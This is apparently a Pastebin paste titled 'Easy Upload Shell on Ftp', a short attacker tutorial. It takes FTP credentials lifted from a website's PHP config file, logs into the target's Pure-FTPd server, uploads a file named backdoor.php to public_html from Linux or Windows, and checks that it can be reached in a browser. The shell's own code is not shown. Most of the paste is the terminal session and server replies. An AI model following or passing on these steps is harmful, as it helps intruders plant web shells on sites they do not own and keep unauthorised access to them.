Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Easy Upload Shell on Ftp
- $config['hostname'] = 'localhost';
- $config['username'] = 'lastc0de';
- $config['password'] = '*******';
- Open Terminal/Cmd
- root@lastc0de#ftp www.site.com
- Connected to www.site.com
- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
- 220-You are user number 3 of 50 allowed.
- 220-Local time is now 09:36. Server port: 21.
- 220-This is a private system - No anonymous login
- 220-IPv6 connections are also welcome on this server.
- 220 You will be disconnected after 15 minutes of inactivity.
- User (www.site.com:(none)):lastc0de
- 331 User lastc0de OK. Password required
- Password:*******
- ftp>cd public_html
- ftp>put backdoor.php //upload shell by linux terminal
- ftp>put C:\backdoor.php //upload shell by win cmd
- Now Check on
- www.site.com/~lastc0de/backdoor.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement